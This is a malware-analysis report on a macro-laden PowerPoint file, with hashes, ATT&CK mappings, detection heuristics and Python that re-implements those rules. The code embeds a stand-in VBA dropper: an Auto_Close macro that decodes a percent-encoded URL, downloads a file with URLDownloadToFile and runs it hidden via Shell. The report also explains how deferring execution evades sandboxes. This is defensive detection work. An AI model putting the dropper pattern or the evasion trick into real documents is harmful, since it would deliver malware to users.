Malicious Office (OLE) / .PPT — malware analysis report

Static analysis result for SHA-256 7b68182ff4843b3f…

MALICIOUS

Office (OLE) / .PPT

68.5 KB Created: 2021-06-23 21:14:32 Authoring application: Microsoft Office PowerPoint
MD5: b3d0db80c67a9f2e23ee273aea645e29 SHA-1: 251aa8ecde2307c9f9167d89c1a89f8685b177d6 SHA-256: 7b68182ff4843b3fb20c299fa3e73fbf0f9a29bf28cad385e04dc756a20e444c
160 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 Command and Scripting Interpreter: PowerShell T1071.001 Application Layer Protocol: Web Protocols
(Note: execution of the VBA macro itself is T1059.005 Command and Scripting Interpreter: Visual Basic; T1059.001 only applies if the `Shell()` call launches PowerShell, which the summary below does not state.)

The file exhibits several characteristics of macro-based malware. The VBA macros, in particular the `Shell()` call and the `Auto_Close` procedure, are the standard building blocks for executing arbitrary code from a document. The macro builds a payload URL that is obfuscated with URL (percent) encoding, downloads the payload from it, and then launches the downloaded file with `Shell()`. Because `Auto_Close` fires only when the document is closed, execution is deferred until the user has finished with the file; this also defeats sandboxes that open a document but never close it. Function and variable names are deliberately meaningless to hinder signature-based detection and manual review.

Heuristics 4

  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code
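The four heuristics above, re-implemented as an added example (this is not the analysis platform's code, and its rule names are reused from the list above only as labels). The macro text is a constructed stand-in with the traits the summary describes (an `Auto_Close` procedure, a percent-encoded URL, a download, a `Shell` launch), not the 820-byte `macros.bas` carved from the sample; `example.invalid` is a reserved test domain, and the "p-code" bytes are a constructed byte string, not a real `__SRP_*` stream. In practice the source would come from `olevba` and the raw stream from the OLE container.

```python
import re
from urllib.parse import unquote

# Constructed stand-in for decoded VBA source (not the carved macros.bas).
SAMPLE_VBA = r'''
Sub Auto_Close()
    Dim x9q As String
    x9q = "h%74t%70%3A%2F%2Fexample.invalid%2Fdl%2Fu.exe"
    z3f x9q
End Sub

Sub z3f(u As String)
    Dim d As String
    d = Environ("TEMP") & "\u.exe"
    URLDownloadToFile 0, unq(u), d, 0, 0
    Shell d, vbHide
End Sub
'''

# Constructed stand-in for a compiled/cache stream: identifier tokens
# surrounded by binary padding, which is all the p-code rule looks at.
SAMPLE_PCODE = (b'\x01\x00\x05\x00Auto_Close\x00\x00\x07\x03'
                b'URLDownloadToFile\x00\x00\x02Shell\x00\xff')

# Severities as listed in the report; rank decides the output order.
SEVERITY = {
    'OLE_VBA_SHELL': 'critical',
    'OLE_VBA_AUTOCLOSE': 'high',
    'OLE_VBA_PCODE_AUTOEXEC_EXEC': 'high',
    'OLE_VBA_MACROS': 'medium',
}
RANK = {'critical': 0, 'high': 1, 'medium': 2}

# Token classes for the p-code rule (matched on raw bytes, case-insensitive).
AUTOEXEC_TOKENS = re.compile(
    rb'Auto_?(Open|Close|Exec)|Document_(Open|Close)|Workbook_Open', re.I)
EXEC_TOKENS = re.compile(
    rb'Shell|CreateObject|URLDownloadToFile|XMLHTTP|WScript', re.I)


def find_encoded_urls(src):
    """Percent-decode every string literal; keep the ones that become URLs.

    Returns (literal_as_written, decoded_url) pairs, so an analyst sees both
    the obfuscated form that evades plain 'http://' signatures and the IOC.
    """
    out = []
    for lit in re.findall(r'"([^"\n]*)"', src):
        dec = unquote(lit)
        if re.match(r'https?://', dec, re.I):
            out.append((lit, dec))
    return out


def scan_source(src):
    """Source-level rules: macros present, Auto_Close present, Shell used."""
    hits = []
    if re.search(r'^\s*(Private\s+|Public\s+)?(Sub|Function)\b', src, re.I | re.M):
        hits.append('OLE_VBA_MACROS')
    if re.search(r'\bSub\s+Auto_Close\b', src, re.I):
        hits.append('OLE_VBA_AUTOCLOSE')
    # VBA allows "Shell d, vbHide" without parentheses, so match the
    # identifier itself, not "Shell(". Exclude ".Shell" (WScript.Shell
    # property access) and longer identifiers such as ShellExecute.
    if re.search(r'(?<![.\w])Shell\b', src, re.I):
        hits.append('OLE_VBA_SHELL')
    return hits


def scan_pcode(stream):
    """OLE_VBA_PCODE_AUTOEXEC_EXEC: an auto-exec token together with a
    shell/download/object token in a compiled stream, independent of
    whether source extraction succeeded."""
    if AUTOEXEC_TOKENS.search(stream) and EXEC_TOKENS.search(stream):
        return ['OLE_VBA_PCODE_AUTOEXEC_EXEC']
    return []


def analyse(src, pcode):
    """Run all rules and return (rule, severity) pairs, most severe first."""
    hits = scan_source(src) + scan_pcode(pcode)
    return sorted(((h, SEVERITY[h]) for h in hits), key=lambda p: RANK[p[1]])


if __name__ == '__main__':
    for rule, sev in analyse(SAMPLE_VBA, SAMPLE_PCODE):
        print(f'{sev:8s} {rule}')
    for lit, url in find_encoded_urls(SAMPLE_VBA):
        print(f'decoded {lit!r} -> {url}')
```

The p-code rule is intentionally token-based rather than a disassembler: its purpose is to still fire when `olevba` cannot recover source (p-code-only documents, stomped or corrupted source streams), at the cost of matching any stream that merely contains both token classes, so it is scored high rather than critical.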

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas (SHA-256 e9d0c6fefdf4b0771ea74c55cdba35b5adb513805971983bff30d2868e67d782) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 820 bytes